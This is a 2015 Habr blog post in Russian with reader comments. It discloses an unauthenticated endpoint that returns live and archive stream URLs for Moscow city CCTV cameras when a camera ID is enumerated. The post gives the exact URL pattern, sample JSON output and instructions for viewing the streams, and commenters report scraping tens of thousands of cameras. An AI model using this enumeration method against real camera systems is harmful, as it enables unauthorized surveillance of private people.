Пользователь
0,0
рейтинг
24 января 2015 в 11:03

Разработка → Был получен несанкционированный доступ к более чем 20 000 камерам видео-наблюдения Москвы (теперь вы тоже) из песочницы

Привет, Хабрахабр! Наверняка многие из вас помнят легендарный пост «Были получены исходники 3300 глобальных интернет-проектов», который долгое время был первым в рейтинге всех публикаций на сайте. Несмотря на схожий заголовок у моего поста, не претендую на первое место, но считаю, что вам стоит обратить внимание.



Эта история началась поздним вечером, когда я задержался на работе, чтобы доделать срочное задание, связанное с нашими партнерами из Амстердама. Закончив тестирование последнего модуля, я удовлетворенно откинулся в кресле и по привычке зашел проверить свою страницу в VK. В одном из моих пабликов я увидел фотографию с камеры наблюдения со служебными данными на ней. Заинтересовавшись этой фотографией, я обратился к автору изображения с просьбой получить доступ к данной камере.

На моё удивление, мне ответили. Мне сказали, что можно получить ссылку временного доступа, которая действует в течение недели и не позволяет управлять камерой и смотреть архив.

Ссылка:

obmen-video.echd.ru/embed/noauth/здесь_много_соли

Будучи вдумчивым по своей природе, я заглянул в source и обнаружил следующее:

window.APP_VERSION = '0.1';
window.BUILD_ID = 'public';
window.embeddedCamera = {"id":******,"name":"MMC_***; такой-то парк","shortName":"MMC_***","address":"такой-то адрес ","description":null,"type":{"id":4,"color":"0D0D0D"},"cameraType":4,"apiType":"ECHD_CISCO_VSM","fixed":false,"status":0,"lat":"***","lng":"***"};
window.Request = {"id":"4a6a19d5-ab03-4cb1-8fc4-281345c873f5","innerId":"******","userId":***,"ttl":1422353451835}; // Mapped HTTP request (POST/GET params)

Несложно догадаться, что используя следующий URL

http://obmen-video.echd.ru/cameraManager/ajaxGetVideoUrls?id=666&_=1421929669467

Я получил следующий набор потоков:

{"666":{"archive":{"control":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPUYDZTXZ6IZ4K6K2D4Z32JVYHTZZMPPQLOQIXORE6SQ7VYXW56VAPXC6W7XEKRZRM47PZUOA3IC54IA2SQRM7UVZ5GRJLG5Z5QVU3MZD54L7Y3TUXKT37FEKQLGCTLIEXWT6BHTNWUIVWXMJ27PT4PSGWVQ/token-1422045167179-archive?rec","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MZV4X63ULMSFYGKMEH4VGPM5AGTMD2SLKYJBJJ3IPCL54IP6UEE3T7Y2M5WLHCIIDEU4L6SGIICY35JRUYPBV4TPHSOIONYI43SQ2FJHOCJIRYHVB6XL7VBWNBEN6TDNTLBSCLLF3I5BZQC3ZKKLSH6OTTVQ/token-1422045167179-archive?rec"],"shot":{"control":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPUYDZTXZ6IZ4K6K2D4Z32JVYHTZZMPPQLOQIXORE6SQ7VYXW56VAV6YN676UFMPOA5IAVYQRPTSGHYJRLEBV6BMZJLIIS6HEEV4HSTY3CQ6NSIVAQCKZH3VHGASAUT5CO/token-1422045167183-archiveSnapshot","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MZV4X63ULMSFYGKMEH4VGPM5AGTMD2SLKYJBJJ3IPCL54IP6UEE3TRT4ZAOLGKV3N773W4C77HX3OCGGKPPKK3PXJD33DIM2IXV7KB6RSS6W77H7EZOEUDHGJYBBHSDBUC/token-1422045167183-archiveSnapshot"],"url":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPUYDZTXZ6IZ4K6K2D4Z32JVYHTZZMPPQLOQIXORE6SQ7VYXW56VAV6YN676UFMPOA5IAVYQRPTSGHYJRLEBV6BMZJLIIS6HEEV4HSTYTTINJRDZ2GL7WOO7SZ7ZPBCHYI/token-1422045167183-archiveSnapshot?shot","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MZV4X63ULMSFYGKMEH4VGPM5AGTMD2SLKYJBJJ3IPCL54IP6UEE3TRT4ZAOLGKV3N773W4C77HX3OCGGKPPKK3PXJD33DIM2IXV7KB6R2H6KF2MR6CEMATGWCCCTHISRR7FT2YTBP4YYIJ3OL2NO2H3HNFKA/token-1422045167183-archiveSnapshot?shot"]},"url":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPUYDZTXZ6IZ4K6K2D4Z32JVYHTZZMPPQLOQIXORE6SQ7VYXW56VAWITQRF3YOGFW4MY5G6HIXB4Q4BJWMEAUFWUSDRYIHMSSV7TIERGLPA6ZSKAH4PZBIWTHDGHUUZC7MN63V4EQVDG6ZG7WB3UJPLFPN2UMVPLN4FQQGMPK2LHN6DPZ7WWD/token-1422045167179-archive?recarchive","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MZV4X63ULMSFYGKMEH4VGPM5AGTMD2SLKYJBJJ3IPCL54IP6UEE3T63RJ6RODZTXZJFRMZSVUTHTK5UJRLEBV6BMZJLIIS6HEEV4HSTYSPCZMFZXP3LMKAHRSDZZ5COMCC2ITAXECLVW2LULL5TAEYY3U6H34HIN4ZH6WS55JQNX57IB3X6RY/token-1422045167179-archive?recarchive"]},"live":{"ios":{"url":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPKQWXTJMRZUUPCNKVNGWVT5MV3RZMPPQLOQIXORE6SQ7VYXW56VACWZDB6LQB7JO7MVPL4QBAM5LAFJWMEAUFWUSDRYIHMSSV7TIERGA2ISAPZHDCKR4FQWNRCYQB3XM4/token-1422045167167-live?m3u","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MYJ4M3MY7A76J3LAIAGQRVJ3QDHED2SLKYJBJJ3IPCL54IP6UEE3TV43JQYUDH6HFPFF5WDDH4HS2CEJRLEBV6BMZJLIIS6HEEV4HSTYQ47LXC65XYUJF2LA4ICOS7QXVY/token-1422045167167-live?m3u"]},"shot":{"url":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPKQWXTJMRZUUPCNKVNGWVT5MV3RZMPPQLOQIXORE6SQ7VYXW56VACWZDB6LQB7JO7MVPL4QBAM5LAFJWMEAUFWUSDRYIHMSSV7TIERGA2ISAPZHDCKR4FQWNRCYQB3XM4/token-1422045167174-liveSnapshot?shot","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MYJ4M3MY7A76J3LAIAGQRVJ3QDHED2SLKYJBJJ3IPCL54IP6UEE3TV43JQYUDH6HFPFF5WDDH4HS2CEJRLEBV6BMZJLIIS6HEEV4HSTYQ47LXC65XYUJF2LA4ICOS7QXVY/token-1422045167174-liveSnapshot?shot"]},"url":["http://iStream4.echd.ru:7020/YERP5AYFE4YZQOBKUWPGCTT7YCOVF35H3KH35M5542D7VRRJZT2W7YEMSKK4ABMGWFKC6O6XRYHNPKQWXTJMRZUUPCNKVNGWVT5MV3RZMPPQLOQIXORE6SQ7VYXW56VACWZDB6LQB7JO7MVPL4QBAM5LAFJWMEAUFWUSDRYIHMSSV7TIERGA2ISAPZHDCKR4FQWNRCYQB3XM4/token-1422045167167-live","http://iStream5.echd.ru:26020/HRKCYL6YERQKA75CNXRQXIMA5BTK3NHBJ5ZWYDNRQEOBPNXAAHHNGEVVJETU7YCFK3EX4SXPOV4MYJ4M3MY7A76J3LAIAGQRVJ3QDHED2SLKYJBJJ3IPCL54IP6UEE3TV43JQYUDH6HFPFF5WDDH4HS2CEJRLEBV6BMZJLIIS6HEEV4HSTYQ47LXC65XYUJF2LA4ICOS7QXVY/token-1422045167167-live"]},"version":100}}

Можно получить доступ к потоку камеры с произвольно выбранным айдишником. Первые потоки – это архивы камер, последняя – трансляция в реальном времени.

Открыв URL любым плеером (VLC, например), мы можем увидеть следующее:



Данная камера не очень показательная в плане качества изображения, но первоначальный поток MMC_ выдавал вполне приличную картинку с хорошим фреймрейтом.

Короче. Вставляете ссылку вида obmen-video.echd.ru/cameraManager/ajaxGetVideoUrls?id=ХХХ&_=1421929669467 в браузер (где ХХХ – произвольный айдишник, я пробовал числа от 50 до 20 000), получаете набор потоков, который можно вставить в медиаплеер на своём смартфоне и при должном упорстве вы можете увидеть себя, курящим у подъезда своего дома…



Как несложно догадаться, всё это принадлежит ЕЦХД (Единому Центру Хранения Данных) – я пытался связаться с ними по поводу уязвимости, но ответа так и не получил. Надеюсь, после этой публикации ошибку всё же исправят.

Спасибо за внимание.
@ipetrov2064
карма
45,0
рейтинг 0,0
Реклама помогает поддерживать и развивать наши сервисы

Подробнее
Реклама

Самое читаемое Разработка

Комментарии (238)

  • +137
    В одной из реалтайм-камер увидел, как седеет админ ЕЦХД.
    • +59
      image

      Вот этот?
      • +33
        сделал на манер картинки панораму из 22989 скриншотов:
        www.gigapan.com/gigapans/f4ef14e2c3017c66476a1fca64bdcc89
        • 0
          жалко зум ограничен
        • +5
          убрал чутка битых камер и значительно увеличил разрешение(было 0.44 гигапикселя, стало — 2.75 гигапикселя)
          www.gigapan.com/gigapans/d2dc3e555a60941be8a36b90a4244086
          • +1
            Можно ли в картинку «вшить» номера камер? На самих камерах вроде какие-то другие идентификаторы отображаются, а то, что было в URL, похоже на Глобальный идентификатор отсюда — data.mos.ru/datasets/1498.
            • +1
              Нет, не сходится.
              На камерах подписано UVAO, VAO… (по округам).
              Не подходят ни номер в json, ни номер из строки с самой камеры, которая в верхнем левом углу.
              Вот если бы вдруг оказалось, что в url хеш совсем не хеш…
            • +6
              вшил номера камер(id)
              www.gigapan.com/gigapans/f980176c24565aa151dbaa31edab2f52
  • +76
    Вот он, тот самый хабр! Интересная дыра, хороший анализ и горячий профит. И спасибо за отсылку на наш старый пост )
    Кстати, думаю на днях опубликую ещё очень вкусную дыру одного очень крупного Московского провайдера.
    • +13
      У вас тоже начало складываться навязчивое впечатление, что «Хабр — не торт», от которого стало трудно отделаться, да? Я без шуток сейчас. Безумно обрадовался этой статье, потому что она как-то вернула ощущение «ну вот же, вот — тот самый Хабр, жив еще бродяга!»
    • 0
      В вашей статье сейчас много незагружающихся картинок! Потомки не заценят.
      • +1
        Поправил. Но смысл, конечно, там не в картинках )
  • +67
    Так вот как хакеры в фильмах лихо подключаются ко всем камерам видеонаблюдения. Действительно просто.
    • +7
      Так вот как работал смартфон Эйдена Пирса из Watch Dogs :)) Жалко только, что здесь нельзя эти камеры поворачивать)
      • 0
        Кстати, было бы действительно здорово обуздать эту уязвимость. Действительно, открылись бы потрясающие возможности. Установив местоположения камер, можно было бы довольно несложно составить небольшую базу и искать в ней со своего мобильного устройства ближайшую на данный момент камеру, получать доступ к ее медиапотоку, играть в WatchDogs…
    • 0
      И все же, все далеко не так просто. Перед ошеломляющим результатом следовал анализ, сложившийся весьма успешно, кстати говоря. Отчасти благодарить здесь надо и ряд удачно сложившихся обстоятельств: выполненная работа, чувство удовлетворенности, паблик, удачный коммьюникэйшн с автором первого shot`а с уязвимой камеры… Именно за эту непредопределенность крякинг никогда не потеряет своей привлекательности ;)
  • +6
    Спасибо, собрал базу. Получится красивый коллаж из скриншотов.
  • +20
    А есть какой-то закон по которому они не могут выставить все эти камеры общественности? Всё таки не в кабинет подглядываешь а на общую улицу. Больше глаз — быстрее б всякие неприятные вещи всплывали типа барыг и тёмные личности.
    • +3
      планируют выставить
      lenta.ru/news/2014/10/07/mospatrol/
      • 0
        Вот как раз «Электронный атлас» нам-то и нужен!
      • +4
        из статьи на ленте:
        «Доступ к снимкам жителям и организациям будет предоставляться по запросу.»

        Это может означать очень разное по факту.
        • +1
          Ответ на запрос будет предоставлен в течение 15 рабочих дней письмом на домашний адрес, почтой России.
        • +2
          Нет, не так. Делаем сервис для жителей, параметры доступа — к какому типу камер, с какими ограничениями и на каких условиях — все это еще обсуждается. В рамках «Окна в город», например, уже сейчас камеры из мест массового скопления людей в открытом доступе без всяких запросов. С организациями отдельная история. Все зависит от их типа, сотрудничество с поисковым отрядом «Лиза алерт» это одна история, сотрудничество со страховой или охранным агентством — другая.
        • 0
          Очевидно, имелся ввиду, скажем, SQL-запрос, или поисковый запрос, ведущий на данную статью.
    • +56
      Кстати вот господин поднимает интересный вопрос. Почему открытость рассматривается в негативном ключе, ведь камеры установлены в публичных местах, доступ к которым не ограничивается? Т.е. если все наблюдаемые сцены можно законно узреть своими глазами, почему наблюдение через камеры рассматривается как нечто незаконное?
      • –16
        Наверное, потому, что смотреть — законно, а следить — нет. Ведь камеры дают неограниченные возможности для слежки за человеком.
        • НЛО прилетело и опубликовало эту надпись здесь
          • +2
            Если вы умеете по мере перемещения человека перемещаться за ним из одного окна в другое… В принципе, просто идти за человеком по пятам, записывая, где он идет, с кем общается — это тоже слежка и тоже незаконна.
            • +1
              Что, правда что ли? И в чем же незаконность? Есть пруфы на УК или это вам так кажется?
              Заодно спрошу — это как-то ограничено по времени? Пять минут за человеком идти записывая можно, а восемь часов — нельзя?
              • +2
                УК РФ Статья 137. Нарушение неприкосновенности частной жизни
                1. Незаконное собирание или распространение сведений о частной жизни лица, составляющих его личную или семейную тайну, без его согласия либо распространение этих сведений в публичном выступлении, публично демонстрирующемся произведении или средствах массовой информации.

                Про время тут не сказано, но запрет на сбор без согласия есть.
                • 0
                  Так это же *незаконное* собирание наказывается. Если я иду за человеком и снимаю на видеокамеру его затылок — это вполне законно. Впрочем, если я иду перед ним и снимаю его лицо — это тоже законно.
                  Котам на королей смотреть не возбраняется.
                  Давайте без рекурсивных определений попытаемся обойтись, а?
                  • +4
                    Смотрите, какая тут штука. Закон — это всё таки не математическая аксиома, а устоявшееся в правовой практике понимание.

                    Если я выбегу на улицу, поснимаю прохожих и выложу в интернет, то это никак не подведут под незаконное собирание. Если я буду хотя бы даже неделю ходить за вами, снимать на видео или просто смотреть, куда вы ходите, то это вне всяких сомнений слежка.

                    Недавно был такой ресурс, который агрессивно из всех публичных источников собирал информацию по человеку, т.е. склеивал профили. Все это делают, но они это делали открыто и быстро были закрыты в том числе из-за боязни схлопотать такие иски.

                    Т.е. важно понимать, что особенности слежки: целенаправленные, систематические и персонализированные действия.
                    • 0
                      > Если я буду хотя бы даже неделю ходить за вами, снимать на
                      > видео или просто смотреть, куда вы ходите, то это вне всяких сомнений слежка.

                      Идите подайте в суд на операторов сотовой связи — они с точностью до нескольких метров знают ваше местоположение. А потом на банки и магазины — они следят за тем, какие продукты и товары вы покупаете.

                      > Т.е. важно понимать, что особенности слежки: целенаправленные,
                      > систематические и персонализированные действия.

                      Если я сижу у окна, а вы каждое утро под моим окном проходите с утра на работу, а вечером с работы — то я целенаправленно, систематически и персонализированно за вами слежу? Валяйте, попытайтесь наказать меня за незаконное действие. Я посмеюсь.

                      > Если я буду хотя бы даже неделю ходить за вами, снимать
                      > на видео или просто смотреть, куда вы ходите, то это вне всяких сомнений слежка.

                      Где начало того конца, которым оканчивается начало? Инами словами — кто определяет границу дозволенного и незаконного?
                      • +2
                        Вы мне задаете кучу вопросов, которые в целом правильные, но по сути бессмысленные, потому что:

                        > Инами словами — кто определяет границу дозволенного и незаконного?

                        определяет судья. Хороший судья на основании правоприменительной практики (у нас нет прецедентов, но практика есть), плохой на основании её левой пятки.

                        Хороший адвокат знает судью и знает, как ей привычнее.
                      • +1
                        > Идите подайте в суд на операторов сотовой связи — они с точностью до нескольких метров знают ваше местоположение. А потом на банки и магазины — они следят за тем, какие продукты и товары вы покупаете.
                        Операторы следят законно. У них требования по закону хранить ваши соединения с сетью.
                        Банк не хранит список моих покупок, он хранит, что в магазине N было списано X денег. Это принцип работы банка, тут нет нарушения закона
                        Магазин, если я расплачиваюсь наличкой, вообще ничего не хранит, кроме факта выдачи товара в обмен на деньги. Если вы картой оплачиваете, то там есть привязка к некой транзакции. Если вы ещё магазинную карту для скидки предъявили и вам там записали в ваш личный кабинет список покупок, то в правилах пользования этой карты скорей всего написано, что они записывают ваши покупки, а вы согласились с этими правилами.

                        Ходить за человеком, когда его можно точно опознать, записывать за ним его действия без юридических оснований, тут законность сомнительна, но решать её будет суд.
                        • 0
                          Что же получается, у изобретения АНБ — Фейсбук, есть и предшественник:

                          image
                    • +1
                      Т.е. если я каждое утро в 07:30 буду фотографировать свою остановку и выкладывать фотографии в интернет, то меня можно будет привлечь по данной статье? Сударыня-то там одна и та же на них будет.
                      • –1
                        Ну тут можно отвертеться тем, что объектом съемки является остановка, а не сударыня. Но это если доказать сможете.
                        • +1
                          Это сударыне придется доказывать. У человека, фотографирующего по утрам автобусную остановку есть презумпция невиновности.
                • +2
                  Ну личной частной жизни по определению не может быть в общественном мнении. Человек, конечно же, может там попробовать уединиться, но его уединение могут вполне законно нарушить.
                  Так что камера в публично месте не может подпадать под эту статью.
                  • 0
                    Личная частная жизнь может быть в своём пространстве, которое можно нарушить, но по веским причинам (подозрение в незаконной деятельности). В остальное же время — это ваше пространство, что хотите то и делайте.
                    В общественных местах такого пространства нет, но вы имеете полное право делать что вам хочется, пока вы не нарушаете закон.
                    Статья приводилась как довод на слежку за человеком:
                    — Если вы просто с коллегой идёте от подъезда до работы (вы с ним живёте в одном подъезде), то суд не сочтёт это систематической слежкой.
                    — Если же вы приезжаете специально и идёте за своим коллегой до работы от его подъезда (а вы живёте совершенно в другом районе и пути ваши не должны пересекаться), то тут суд может задуматься о ваших странных повадках. В западных странах вроде бы есть решения, которые запрещают приближаться к определённому человеку на N метров, у нас же, скорей всего, его заявление на вас полиция не примет.
                    • 0
                      На западе много такого в законах, что у нас нет и близко. У нас нельзя запретить приближаться к человеку на столько то метров и т. п. в том числе. В 99% случаев даже если вы целенаправленно будите ходить за человеком и следить за ним вас никоим образом не смогут привлечь к ответственности. Например, те же детективные агентства, когда жена нанимает детектива следить за неверным мужем…
                      Измена — это не нарушение закона, но при этом детектива не признают виновным, если он не будет получать данные не законным путем (проникая в частное жилище, устраивая прослушку и т. п.)
                      • 0
                        В 99% случаев даже если вы целенаправленно будите ходить за человеком и следить за ним вас никоим образом не смогут привлечь к ответственности. Например, те же детективные агентства, когда жена нанимает детектива следить за неверным мужем…
                        Не смогут привлечь, потому что в заявлении полиция может не найти уголовного дела с первого раза. У них такое бывает «в связи с отсутствием состава преступления».
                        Но ФЗ «О частной детективной и охранной деятельности в российской федерации» говорит
                        > Статья 7. Ограничения в сфере деятельности частного детектива
                        > Частным детективам запрещается:
                        > 3) собирать сведения, связанные с личной жизнью, с политическими и религиозными убеждениями отдельных лиц;
                        Кто и с кем спит под общественную жизнь человека подходит плохо.
            • +1
              не хочу вас расстраивать, но такие системы есть только в болливудских фильмах, рекламных буклетах и дипломных работах.

              В реально жизни по городу висят камеры 640x480, которые примерно в 10 раз слабее чем минимально нужно.
      • +20
        Более того, все это установлено на средства с наших налогов.
      • –1
        Страшен не факт того, что кто-то «лишний» это увидит. Страшно, если кто-то (еще) начнет использовать это в своих личных целях. Например, можно анализировать потоки людей. Первое, что приходит в голову. Чтобы вычислять наиболее людные (или безлюдные) места. Можно удаленно наблюдать, например, за своим домом, есть ли там засада, например (ну… как вариант). Или еще что-то.
      • +1
        Смотрите, ниже уже возникают предположения о возникновении хабраэффекта на сервисе. Тоже не дело.
      • 0
        Хотя я так подумал. С другой стороны, совершить преступление незамеченным уже затруднительно. Это уже плюс.
        • 0
          Если знаешь где камера висит и что видит, то ее можно и обойти.
          Если не знаешь о том, что камера есть, то она может тебя заснять.

          Думаю основной эффект — предупреждение преступлений.
    • +8
      ИМХО такие вещи должны быть доступны всем в открытом виде: ничего личного там нет (в общественном месте ведь снято), а может быть полезно, чтобы понять, кто стукнул автомобиль или украл лавочку во дворе.
      • +3
        А также из удобного кресла наблюдать за кем-то, зная во сколько он уезжает-приезжает, со всеми возможными вытекающими.
        • +10
          Но разница с обычным легальным стоянием на улице и смотрением глазами только в «удобном кресле», не так ли?
          • +1
            А еще в том, что объект может заметить человека, который за ним постоянно по пятам ходит, и сделать выводы. Открыто смотреть можно сколько угодно, но скрытое наблюдение просто так вести нельзя.
            • 0
              Вы можете это делать и сидя в автомобиле с тонированными стеклами в мягком кресле.

              elite7 это можно делать и без камер, из автомобиля.
              • 0
                Автомобиль можно заметить. Камеру, которая «тут всегда висела», заподозрить в том, что в нее смотрит кто-то не тот, практически невозможно.

                Ну и вообще — статья 137 УК РФ. Если камера висит — это совершенно не значит, что в нее может смотреть кто угодно и зачем угодно.
                • +1
                  137 не будет работать, если камера висит в публичном месте.
                  Если же вы поставите камеру кому-то в жилище, то тогда уже будет состав.
                  • +1
                    137 не оговаривает место размещения камеры, она про то, что с этой камеры снимается, кем и зачем.
              • 0
                Чтобы собрать базу такого же объема надо каждый день ездить на автомобиле по всей Москве и снимать дома.

                То есть умножаем много бензина на много дней — получаем серьезную сумму, а тут уже всё есть бесплатно.

                Далее данные нужно обработать, так как склеивать фото нужно из разных точек обзора, под разными углами.

                Здесь же положение камер фиксировано — все что нужно, это перемножить яркость фотографий одной и той же камеры, сделанных в темное время суток в течении нескольких недель — и вот он список квартир.

                А ведь кроме квартир, можно ловить кадры с людьми, их лицами, составлять досье, где был, когда приходит, уходит, с кем, это всё приватная информация, которая будет легкоизвлекаема и общедоступна.
        • 0
          Это и есть развлекалочка префектов. Говорят правда что за дворниками наблюдают, мол как работают, ага.
          Предлагаю камеры направить на первых, чтоб по-чесноку.
      • +1
        статистика по горящим окнам позволяет составить список неиспользуемых квартир
        • НЛО прилетело и опубликовало эту надпись здесь
          • +1
            Угу. И у какого количества людей такая система установлена и используется?
            • 0
              К слову, я в одном из наших Мухосранск-супермаркетов вида «магнит/лента» видел подобную штуку (в форм-факторе нашлепки на розетку) за что-то около 300р пару месяцев назад. Так что достать такую штуку — совсем не проблема.
              • 0
                Так вопрос не в цене. Вопрос (риторический) в том, у какого % населения такие вещи уже установлены. Ответ, думаю, очевиден — практически ни у кого. Так что замечание elite7 верно.
            • НЛО прилетело и опубликовало эту надпись здесь
      • 0
        Очень спорное заявление. Простые примеры
        Вы публичная персона и сходили «налево», ваши фото с камер вывалены в интернет.
        Вы нажрались в зюзю и видео с вашими поступками выкладывают на Youtube
        Ваш график (когда пришел, когда ушел, куда постоянно ходит) доступен без слежки — тупо в камеры посмотреть. Подловить и ограбить в лифте никаких проблем — вы же придете после работы в 19-22.
        Можно не вставая с кресла узнать когда вас нет дома и грабануть квартиру. Причем если видео доступно за несколько дней вероятность 100%. Зная информацию с предыдущего пункта — вообще великолепно.
        Угон машины становится легкой прогулкой. Можно отследить машины на стоянке и владельцев. Оставил машину и уехал? Вся ночь впереди.
        • 0
          А воры/угонщики/грабители/убийцы и прочие почему вдруг стали невидимками для камер?
          • 0
            Если ты знаешь где они находятся и куда смотрят? Шапку на глаза, за пару минут зашел в подъезд и поднялся на пролет. Зашла жертва — дал по башке и ушел. Ограбление заняло две минуты, на всех камерах грабитель в маске.
            • 0
              И по всем камерам он идёт к себе домой в маске.
              • 0
                Зачем? Они же не 100% покрывают (и даже не 10%). Достаточно уйти за угол дома и выйти на лицевую сторону, где камер нет. С камерами на карте никаких проблем пройти так, что бы дойти до метро или поймать машину не попадаясь на камеры по пути.
        • 0
          ilvar, lolhunter Тут вступают в ход законы тех стран, где вы сделали фото или видео.
          В Дании вы будете нарушителем, даже если регистратор в автомобиль повесите.
          А в России практически любая съемка в публичных местах разрешена.

          Не хотите, чтобы вас снимали — не появляйтесь в России на улицах.

          Вот компиляция законов о съемке в России: mosvideo.pro/blog/zakon-o-foto-i-videosemke/
          • 0
            Проблема не в снимании, а в накоплении информации.
            Вы не ответили на мои примеры.
            Давайте я за вами буду круглосуточно ходить с камерой и снимать? От двери до двери? Публичные же места. С кем, куда, когда и тд? А потом всю эту информацию буду публиковать, скажем, на вашей странице в ВК. Это будет как минимум вмешательство в частную жизнь.
            • 0
              Я для кого ссылку оставил?
              За мной ходить и меня снимать круглосуточно нельзя, ведь я тогда буду основным объектом съемки. Это незаконно.
              А вот поставить камеры на моем пути, которые снимают «пейзажи», где я хожу, можно. Это уже законно.

              > А потом всю эту информацию буду публиковать, скажем, на вашей странице в ВК.
              Легко. Если пользователь разрешил такую возможность вам, то почему бы и нет? Я же разрешил оставлять на моей стене послания только друзьям.
        • +1
          Вы публичная персона и сходили «налево», ваши фото с камер вывалены в интернет.
          Вы нажрались в зюзю и видео с вашими поступками выкладывают на Youtube.

          Еще не хватало, чтобы закон бережно охранял походы «налево» и ужирание в зюзю. Не дай Бог. Не хочешь засветится в невыгодном свете, веди себя прилично. Если ты нормальный, законопослушный гражданин, то тебе скрывать нечего. А ровняться на моральных уродов, я считаю, маразм.

          Про остальное. Гопота, которая грабит в лифтах, мне кажется, не будет мониторить перед этим видео и составлять план.
          А, что касается угонов и ограбления квартир, и последующий уход через «слепые» зоны, то тут тоже есть нюансы. Многие камеры могут поворачиваться. И сделать это смогут только специальные организации, имеющие к этому доступ (полиция, например). Поэтому, просчитать «слепые» зоны не всегда удастся.

          Так что, есть, конечно, свои минусы и плюсы. Но, как мне кажется, плюсов все таки больше.
          • –1
            Подход мягко говоря немного не соответствует базовым правам человека. На тайну личной жизни, например.
            Если ты нормальный законопослушный гражданин то тебе терять нечего? Предоставите доступ к своей переписке по почте и в ВК? И доступы на сайты не забудьте. Вы же законопослушный гражданин?
            Почему я должен дергаться и думать как я выгляжу и что я делаю просто потому, что в моем подъезде камера и мой сосед вася может сейчас смотреть на нее? Почему за мной может следить кто угодно. Куда я пошел, с кем, во сколько?
            По поводу гопоты — почему нет и почему гопота? Человек имеющий чуть чуть мозга, интернет и умеющий планировать может спланировать ограбление без проблем и будет очень доволен таким сервисом.
            Многие камеры умеют поворачиваться? И что? Она будет следить за каждым входящим выходящим — еще лучше. Снимем вас во всех подробностях. Или кто-то из полиции узнает об ограблении раньше, чем грабитель выйдет из подъезда? Да у нас дозвониться на 112 занимает от 5 минут.
            • +1
              Подход мягко говоря немного не соответствует базовым правам человека. На тайну личной жизни, например.
              Если ты нормальный законопослушный гражданин то тебе терять нечего? Предоставите доступ к своей переписке по почте и в ВК? И доступы на сайты не забудьте. Вы же законопослушный гражданин?

              Я имел в виду общественные места и общественную жизнь, которая, независимо от наших желаний, начинается, как только мы выходим за пределы своей частной собственности. Тайну личной жизни, личной переписки и т. д., никто не отменял.

              Почему я должен дергаться и думать как я выгляжу и что я делаю просто потому, что в моем подъезде камера и мой сосед вася может сейчас смотреть на нее?

              В подъезде и за пределами него на вас могут смотреть не только через камеру, но и проходящие мимо люди (оффлайн, так сказать). Так что, ваш внешний вид и то, чем вы занимаетесь в общественном месте, по любому должен соответствовать каким-то рамкам приличия. Если, это вас волнует, конечно. Разумеется, если, пока вокруг нет людей, вы хотите поковырять в носу, то тут у меня ответа нет. Но, зато подростки, зная о камерах, скорее всего, не испишут стены, не нассут в лифте и т. д.

              По поводу гопоты — почему нет и почему гопота? Человек имеющий чуть чуть мозга, интернет и умеющий планировать может спланировать ограбление без проблем и будет очень доволен таким сервисом.

              Почему нет? А, где вы видели гопника, имеющего мозг и умеющего планировать?
              Почему гопота? Потому что, в основном так и бывает. Так называемый гоп-стоп.

              Многие камеры умеют поворачиваться? И что? Она будет следить за каждым входящим выходящим — еще лучше. Снимем вас во всех подробностях.

              Я не про это. А про то, что сидите вы дома и планируете, например, ограбление квартиры. Просчитываете «слепые» пути отхода. Приезжаете на место, а некоторые камеры уже повернуты в другую сторону и весь ваш план летит к чертям.
              • 0
                Я имел в виду общественные места и общественную жизнь, которая, независимо от наших желаний, начинается, как только мы выходим за пределы своей частной собственности. Тайну личной жизни, личной переписки и т. д., никто не отменял.

                Да. Но одно дело вы вышли и вас видят и вы видите, другое дело — слежка в практически полностью автоматическом режиме. Нет никаких ограничений писать со всех камер архив, скажем в 2 недели. С отчетами.
                Почему нет? А, где вы видели гопника, имеющего мозг и умеющего планировать?
                Почему гопота? Потому что, в основном так и бывает. Так называемый гоп-стоп.

                Те гопники, что не умеют думать быстро садятся. Остаются те, кто думать умеет хоть чуть чуть.
                Я не про это. А про то, что сидите вы дома и планируете, например, ограбление квартиры.
                Просчитываете «слепые» пути отхода. Приезжаете на место, а некоторые камеры уже повернуты в другую сторону и весь ваш план летит к чертям.

                Давайте предположим.
                У меня двор — большой колодец, только три дома смотрят подъездами наружу, и один внутрь. Если даже предположить, что на всех подъездах камеры и они имеют угол обзора 180 градусов — выйти из их поля зрения никаких проблем. В любой угол между домами можно выйти на дорогу и пропасть из поля зрения камер. Теперь же можно тупо посмотреть где во дворе рабочие камеры и прикинуть с углом в 180 градусов как они просматривают двор и, например, выйти из одного подъезда и зайти в свой.
                • 0
                  Да. Но одно дело вы вышли и вас видят и вы видите, другое дело — слежка в практически полностью автоматическом режиме. Нет никаких ограничений писать со всех камер архив, скажем в 2 недели. С отчетами.

